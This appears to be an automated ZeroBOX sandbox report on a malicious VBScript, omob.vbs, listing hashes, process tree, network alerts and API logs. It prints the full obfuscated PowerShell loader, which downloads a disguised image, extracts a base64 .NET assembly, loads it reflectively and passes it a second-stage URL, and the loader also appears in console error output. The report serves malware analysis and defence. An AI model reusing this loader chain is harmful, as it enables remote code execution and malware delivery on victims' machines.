popup
Summary | ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

omob.vbs

Generic Malware Antivirus Hide_URL PowerShell
  1. Resubmit sample
Category Machine Started Completed
FILE s1_win7_x6401 Sept. 21, 2023, 9:45 a.m. Sept. 21, 2023, 9:47 a.m.
Size 389.5KB
Type Little-endian UTF-16 Unicode text, with very long lines, with CRLF, CR line terminators
MD5 51c03a309d16578fe5a97464df18cac9
SHA256 3a1082f5c321715ac497d677b269c4e6509e9cc5eee71a35e95d1634525ac4d7
CRC32 ED665B3B
ssdeep 3072:IkJUUUUURUHcjKRReUUUUUQUUUUUrUUUUUGapUUUUUjQMUUUUUAUUUUUNWxJnxi0:I7KTQ5EsJGj8dtuRo2pZDSZd0
Yara None matched

  • wscript.exe "C:\Windows\System32\wscript.exe" C:\Users\test22\AppData\Local\Temp\omob.vbs

    2548

    • powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$Codigo = 'J░░░Bp░░░G0░░░YQBn░░░GU░░░VQBy░░░Gw░░░I░░░░░░9░░░C░░░░░░JwBo░░░HQ░░░d░░░Bw░░░HM░░░Og░░░v░░░C8░░░dQBw░░░Gw░░░bwBh░░░GQ░░░Z░░░Bl░░░Gk░░░bQBh░░░Gc░░░ZQBu░░░HM░░░LgBj░░░G8░░░bQ░░░u░░░GI░░░cg░░░v░░░Gk░░░bQBh░░░Gc░░░ZQBz░░░C8░░░M░░░░░░w░░░DQ░░░Lw░░░1░░░DY░░░Mw░░░v░░░DY░░░Mg░░░x░░░C8░░░bwBy░░░Gk░░░ZwBp░░░G4░░░YQBs░░░C8░░░dQBu░░░Gk░░░dgBl░░░HI░░░cwBv░░░F8░░░dgBi░░░HM░░░LgBq░░░H░░░░░░ZQBn░░░D8░░░MQ░░░2░░░Dk░░░M░░░░░░5░░░DM░░░MQ░░░4░░░DU░░░NQ░░░n░░░Ds░░░J░░░B3░░░GU░░░YgBD░░░Gw░░░aQBl░░░G4░░░d░░░░░░g░░░D0░░░I░░░BO░░░GU░░░dw░░░t░░░E8░░░YgBq░░░GU░░░YwB0░░░C░░░░░░UwB5░░░HM░░░d░░░Bl░░░G0░░░LgBO░░░GU░░░d░░░░░░u░░░Fc░░░ZQBi░░░EM░░░b░░░Bp░░░GU░░░bgB0░░░Ds░░░J░░░Bp░░░G0░░░YQBn░░░GU░░░QgB5░░░HQ░░░ZQBz░░░C░░░░░░PQ░░░g░░░CQ░░░dwBl░░░GI░░░QwBs░░░Gk░░░ZQBu░░░HQ░░░LgBE░░░G8░░░dwBu░░░Gw░░░bwBh░░░GQ░░░R░░░Bh░░░HQ░░░YQ░░░o░░░CQ░░░aQBt░░░GE░░░ZwBl░░░FU░░░cgBs░░░Ck░░░Ow░░░k░░░Gk░░░bQBh░░░Gc░░░ZQBU░░░GU░░░e░░░B0░░░C░░░░░░PQ░░░g░░░Fs░░░UwB5░░░HM░░░d░░░Bl░░░G0░░░LgBU░░░GU░░░e░░░B0░░░C4░░░RQBu░░░GM░░░bwBk░░░Gk░░░bgBn░░░F0░░░Og░░░6░░░FU░░░V░░░BG░░░Dg░░░LgBH░░░GU░░░d░░░BT░░░HQ░░░cgBp░░░G4░░░Zw░░░o░░░CQ░░░aQBt░░░GE░░░ZwBl░░░EI░░░eQB0░░░GU░░░cw░░░p░░░Ds░░░J░░░Bz░░░HQ░░░YQBy░░░HQ░░░RgBs░░░GE░░░Zw░░░g░░░D0░░░I░░░░░░n░░░Dw░░░P░░░BC░░░EE░░░UwBF░░░DY░░░N░░░Bf░░░FM░░░V░░░BB░░░FI░░░V░░░░░░+░░░D4░░░Jw░░░7░░░CQ░░░ZQBu░░░GQ░░░RgBs░░░GE░░░Zw░░░g░░░D0░░░I░░░░░░n░░░Dw░░░P░░░BC░░░EE░░░UwBF░░░DY░░░N░░░Bf░░░EU░░░TgBE░░░D4░░░Pg░░░n░░░Ds░░░J░░░Bz░░░HQ░░░YQBy░░░HQ░░░SQBu░░░GQ░░░ZQB4░░░C░░░░░░PQ░░░g░░░CQ░░░aQBt░░░GE░░░ZwBl░░░FQ░░░ZQB4░░░HQ░░░LgBJ░░░G4░░░Z░░░Bl░░░Hg░░░TwBm░░░Cg░░░J░░░Bz░░░HQ░░░YQBy░░░HQ░░░RgBs░░░GE░░░Zw░░░p░░░Ds░░░J░░░Bl░░░G4░░░Z░░░BJ░░░G4░░░Z░░░Bl░░░Hg░░░I░░░░░░9░░░C░░░░░░J░░░Bp░░░G0░░░YQBn░░░GU░░░V░░░Bl░░░Hg░░░d░░░░░░u░░░Ek░░░bgBk░░░GU░░░e░░░BP░░░GY░░░K░░░░░░k░░░GU░░░bgBk░░░EY░░░b░░░Bh░░░Gc░░░KQ░░░7░░░CQ░░░cwB0░░░GE░░░cgB0░░░Ek░░░bgBk░░░GU░░░e░░░░░░g░░░C0░░░ZwBl░░░C░░░░░░M░░░░░░g░░░C0░░░YQBu░░░GQ░░░I░░░░░░k░░░GU░░░bgBk░░░Ek░░░bgBk░░░GU░░░e░░░░░░g░░░C0░░░ZwB0░░░C░░░░░░J░░░Bz░░░HQ░░░YQBy░░░HQ░░░SQBu░░░GQ░░░ZQB4░░░Ds░░░J░░░Bz░░░HQ░░░YQBy░░░HQ░░░SQBu░░░GQ░░░ZQB4░░░C░░░░░░Kw░░░9░░░C░░░░░░J░░░Bz░░░HQ░░░YQBy░░░HQ░░░RgBs░░░GE░░░Zw░░░u░░░Ew░░░ZQBu░░░Gc░░░d░░░Bo░░░Ds░░░J░░░Bi░░░GE░░░cwBl░░░DY░░░N░░░BM░░░GU░░░bgBn░░░HQ░░░a░░░░░░g░░░D0░░░I░░░░░░k░░░GU░░░bgBk░░░Ek░░░bgBk░░░GU░░░e░░░░░░g░░░C0░░░I░░░░░░k░░░HM░░░d░░░Bh░░░HI░░░d░░░BJ░░░G4░░░Z░░░Bl░░░Hg░░░Ow░░░k░░░GI░░░YQBz░░░GU░░░Ng░░░0░░░EM░░░bwBt░░░G0░░░YQBu░░░GQ░░░I░░░░░░9░░░C░░░░░░J░░░Bp░░░G0░░░YQBn░░░GU░░░V░░░Bl░░░Hg░░░d░░░░░░u░░░FM░░░dQBi░░░HM░░░d░░░By░░░Gk░░░bgBn░░░Cg░░░J░░░Bz░░░HQ░░░YQBy░░░HQ░░░SQBu░░░GQ░░░ZQB4░░░Cw░░░I░░░░░░k░░░GI░░░YQBz░░░GU░░░Ng░░░0░░░Ew░░░ZQBu░░░Gc░░░d░░░Bo░░░Ck░░░Ow░░░k░░░GM░░░bwBt░░░G0░░░YQBu░░░GQ░░░QgB5░░░HQ░░░ZQBz░░░C░░░░░░PQ░░░g░░░Fs░░░UwB5░░░HM░░░d░░░Bl░░░G0░░░LgBD░░░G8░░░bgB2░░░GU░░░cgB0░░░F0░░░Og░░░6░░░EY░░░cgBv░░░G0░░░QgBh░░░HM░░░ZQ░░░2░░░DQ░░░UwB0░░░HI░░░aQBu░░░Gc░░░K░░░░░░k░░░GI░░░YQBz░░░GU░░░Ng░░░0░░░EM░░░bwBt░░░G0░░░YQBu░░░GQ░░░KQ░░░7░░░CQ░░░b░░░Bv░░░GE░░░Z░░░Bl░░░GQ░░░QQBz░░░HM░░░ZQBt░░░GI░░░b░░░B5░░░C░░░░░░PQ░░░g░░░Fs░░░UwB5░░░HM░░░d░░░Bl░░░G0░░░LgBS░░░GU░░░ZgBs░░░GU░░░YwB0░░░Gk░░░bwBu░░░C4░░░QQBz░░░HM░░░ZQBt░░░GI░░░b░░░B5░░░F0░░░Og░░░6░░░Ew░░░bwBh░░░GQ░░░K░░░░░░k░░░GM░░░bwBt░░░G0░░░YQBu░░░GQ░░░QgB5░░░HQ░░░ZQBz░░░Ck░░░Ow░░░k░░░HQ░░░eQBw░░░GU░░░I░░░░░░9░░░C░░░░░░J░░░Bs░░░G8░░░YQBk░░░GU░░░Z░░░BB░░░HM░░░cwBl░░░G0░░░YgBs░░░Hk░░░LgBH░░░GU░░░d░░░BU░░░Hk░░░c░░░Bl░░░Cg░░░JwBG░░░Gk░░░YgBl░░░HI░░░LgBI░░░G8░░░bQBl░░░Cc░░░KQ░░░7░░░CQ░░░bQBl░░░HQ░░░a░░░Bv░░░GQ░░░I░░░░░░9░░░C░░░░░░J░░░B0░░░Hk░░░c░░░Bl░░░C4░░░RwBl░░░HQ░░░TQBl░░░HQ░░░a░░░Bv░░░GQ░░░K░░░░░░n░░░FY░░░QQBJ░░░Cc░░░KQ░░░7░░░CQ░░░YQBy░░░Gc░░░dQBt░░░GU░░░bgB0░░░HM░░░I░░░░░░9░░░C░░░░░░L░░░░░░o░░░Cc░░░d░░░B4░░░HQ░░░LgB4░░░G8░░░bQBv░░░C8░░░Mg░░░1░░░C4░░░O░░░░░░0░░░C4░░░M░░░░░░x░░░DE░░░Lg░░░5░░░Dc░░░Lw░░░v░░░Do░░░c░░░B0░░░HQ░░░a░░░░░░n░░░Ck░░░Ow░░░k░░░G0░░░ZQB0░░░Gg░░░bwBk░░░C4░░░SQBu░░░HY░░░bwBr░░░GU░░░K░░░░░░k░░░G4░░░dQBs░░░Gw░░░L░░░░░░g░░░CQ░░░YQBy░░░Gc░░░dQBt░░░GU░░░bgB0░░░HM░░░KQ░░░='";$OWjuxd = [system.Text.encoding]::Unicode.GetString("[system.Convert]::Frombase64string( $codigo.replace('░░░','A') ))";powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD""

      2640

      • powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://uploaddeimagens.com.br/images/004/563/621/original/universo_vbs.jpeg?1690931855';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('Fiber.Home');$method = $type.GetMethod('VAI');$arguments = ,('txt.xomo/25.84.011.97//:ptth');$method.Invoke($null, $arguments)"

        2776

Name Response Post-Analysis Lookup
apps.identrust.com
A 182.162.106.33
CNAME a1952.dscq.akamai.net
A 182.162.106.32
CNAME identrust.edgesuite.net
23.67.53.17
uploaddeimagens.com.br
A 104.21.45.138
A 172.67.215.45
104.21.45.138
IP Address Status Action
104.21.45.138 Active Moloch
164.124.101.2 Active Moloch
182.162.106.33 Active Moloch

Suricata Alerts

Flow SID Signature Category
TCP 192.168.56.101:49166 -> 104.21.45.138:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined

Suricata TLS

Flow Issuer Subject Fingerprint
TLSv1
192.168.56.101:49166
104.21.45.138:443 		C=US, O=Let's Encrypt, CN=E1 CN=uploaddeimagens.com.br 67:68:c4:e4:aa:54:e1:fd:f0:50:01:73:1e:da:cf:48:0c:17:0d:34

Time & API Arguments Status Return Repeated

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameA

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameA

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0
Time & API Arguments Status Return Repeated

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0
Time & API Arguments Status Return Repeated

WriteConsoleW

 buffer: Exception calling "DownloadData" with "1" argument(s): "The underlying connecti
console_handle: 0x00000023
1 1 0

WriteConsoleW

 buffer: on was closed: Could not establish trust relationship for the SSL/TLS secure ch
console_handle: 0x0000002f
1 1 0

WriteConsoleW

 buffer: annel."
console_handle: 0x0000003b
1 1 0

WriteConsoleW

 buffer: At line:1 char:185
console_handle: 0x00000047
1 1 0

WriteConsoleW

 buffer: + $imageUrl = 'https://uploaddeimagens.com.br/images/004/563/621/original/unive
console_handle: 0x00000053
1 1 0

WriteConsoleW

 buffer: rso_vbs.jpeg?1690931855';$webClient = New-Object System.Net.WebClient;$imageByt
console_handle: 0x0000005f
1 1 0

WriteConsoleW

 buffer: es = $webClient.DownloadData <<<< ($imageUrl);$imageText = [System.Text.Encodin
console_handle: 0x0000006b
1 1 0

WriteConsoleW

 buffer: g]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<B
console_handle: 0x00000077
1 1 0

WriteConsoleW

 buffer: ASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageTex
console_handle: 0x00000083
1 1 0

WriteConsoleW

 buffer: t.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startInde
console_handle: 0x0000008f
1 1 0

WriteConsoleW

 buffer: x += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command =
console_handle: 0x0000009b
1 1 0

WriteConsoleW

 buffer: $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Conve
console_handle: 0x000000a7
1 1 0

WriteConsoleW

 buffer: rt]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Asse
console_handle: 0x000000b3
1 1 0

WriteConsoleW

 buffer: mbly]::Load($commandBytes);$type = $loadedAssembly.GetType('Fiber.Home');$metho
console_handle: 0x000000bf
1 1 0

WriteConsoleW

 buffer: d = $type.GetMethod('VAI');$arguments = ,('txt.xomo/25.84.011.97//:ptth');$meth
console_handle: 0x000000cb
1 1 0

WriteConsoleW

 buffer: od.Invoke($null, $arguments)
console_handle: 0x000000d7
1 1 0

WriteConsoleW

 buffer: + CategoryInfo : NotSpecified: (:) [], MethodInvocationException
console_handle: 0x000000e3
1 1 0

WriteConsoleW

 buffer: + FullyQualifiedErrorId : DotNetMethodException
console_handle: 0x000000ef
1 1 0

WriteConsoleW

 buffer: Exception calling "GetString" with "1" argument(s): "Array cannot be null.
console_handle: 0x0000010f
1 1 0

WriteConsoleW

 buffer: Parameter name: bytes"
console_handle: 0x0000011b
1 1 0

WriteConsoleW

 buffer: At line:1 char:248
console_handle: 0x00000127
1 1 0

WriteConsoleW

 buffer: + $imageUrl = 'https://uploaddeimagens.com.br/images/004/563/621/original/unive
console_handle: 0x00000133
1 1 0

WriteConsoleW

 buffer: rso_vbs.jpeg?1690931855';$webClient = New-Object System.Net.WebClient;$imageByt
console_handle: 0x0000013f
1 1 0

WriteConsoleW

 buffer: es = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UT
console_handle: 0x0000014b
1 1 0

WriteConsoleW

 buffer: F8.GetString <<<< ($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<B
console_handle: 0x00000157
1 1 0

WriteConsoleW

 buffer: ASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageTex
console_handle: 0x00000163
1 1 0

WriteConsoleW

 buffer: t.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startInde
console_handle: 0x0000016f
1 1 0

WriteConsoleW

 buffer: x += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command =
console_handle: 0x0000017b
1 1 0

WriteConsoleW

 buffer: $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Conve
console_handle: 0x00000187
1 1 0

WriteConsoleW

 buffer: rt]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Asse
console_handle: 0x00000193
1 1 0

WriteConsoleW

 buffer: mbly]::Load($commandBytes);$type = $loadedAssembly.GetType('Fiber.Home');$metho
console_handle: 0x0000019f
1 1 0

WriteConsoleW

 buffer: d = $type.GetMethod('VAI');$arguments = ,('txt.xomo/25.84.011.97//:ptth');$meth
console_handle: 0x000001ab
1 1 0

WriteConsoleW

 buffer: od.Invoke($null, $arguments)
console_handle: 0x000001b7
1 1 0

WriteConsoleW

 buffer: + CategoryInfo : NotSpecified: (:) [], MethodInvocationException
console_handle: 0x000001c3
1 1 0

WriteConsoleW

 buffer: + FullyQualifiedErrorId : DotNetMethodException
console_handle: 0x000001cf
1 1 0

WriteConsoleW

 buffer: You cannot call a method on a null-valued expression.
console_handle: 0x000001ef
1 1 0

WriteConsoleW

 buffer: At line:1 char:354
console_handle: 0x000001fb
1 1 0

WriteConsoleW

 buffer: + $imageUrl = 'https://uploaddeimagens.com.br/images/004/563/621/original/unive
console_handle: 0x00000207
1 1 0

WriteConsoleW

 buffer: rso_vbs.jpeg?1690931855';$webClient = New-Object System.Net.WebClient;$imageByt
console_handle: 0x00000213
1 1 0

WriteConsoleW

 buffer: es = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UT
console_handle: 0x0000021f
1 1 0

WriteConsoleW

 buffer: F8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_
console_handle: 0x0000022b
1 1 0

WriteConsoleW

 buffer: END>>';$startIndex = $imageText.IndexOf <<<< ($startFlag);$endIndex = $imageTex
console_handle: 0x00000237
1 1 0

WriteConsoleW

 buffer: t.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startInde
console_handle: 0x00000243
1 1 0

WriteConsoleW

 buffer: x += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command =
console_handle: 0x0000024f
1 1 0

WriteConsoleW

 buffer: $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Conve
console_handle: 0x0000025b
1 1 0

WriteConsoleW

 buffer: rt]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Asse
console_handle: 0x00000267
1 1 0

WriteConsoleW

 buffer: mbly]::Load($commandBytes);$type = $loadedAssembly.GetType('Fiber.Home');$metho
console_handle: 0x00000273
1 1 0

WriteConsoleW

 buffer: d = $type.GetMethod('VAI');$arguments = ,('txt.xomo/25.84.011.97//:ptth');$meth
console_handle: 0x0000027f
1 1 0

WriteConsoleW

 buffer: od.Invoke($null, $arguments)
console_handle: 0x0000028b
1 1 0

WriteConsoleW

 buffer: + CategoryInfo : InvalidOperation: (IndexOf:String) [], RuntimeEx
console_handle: 0x00000297
1 1 0
Time & API Arguments Status Return Repeated

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x005fb140
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x005fb700
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x005fb700
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x005fb700
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x005fba40
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x005fba40
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x005fba40
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x005fba40
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x005fba40
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x005fba40
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x005fb5c0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x005fb5c0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x005fb5c0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x005fb700
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x005fb700
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x005fb700
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x005fb200
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x005fb700
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x005fb700
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x005fb700
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x005fb700
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x005fb700
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x005fb700
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x005fb700
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x005fadc0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x005fadc0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x005fadc0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x005fadc0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x005fadc0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x005fadc0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x005fadc0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x005fadc0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x005fadc0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x005fadc0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x005fadc0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x005fadc0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x005fadc0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x005fadc0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x005fba00
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x005fba00
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004b9e90
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004bac50
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004bac50
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004bac50
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004bab50
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004bab50
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004bab50
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004bab50
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004bab50
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004bab50
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

 1 1 0
request GET http://apps.identrust.com/roots/dstrootcax3.p7c
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

 process_identifier: 2640
region_size: 1507328
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02980000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2640
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02ab0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2640
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72891000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2640
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x01f1a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2640
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 8192
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72892000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2640
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x01f12000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2640
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x01f22000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2640
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02ab1000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2640
region_size: 8192
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02ab2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2640
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0229a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2640
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x01f23000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2640
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
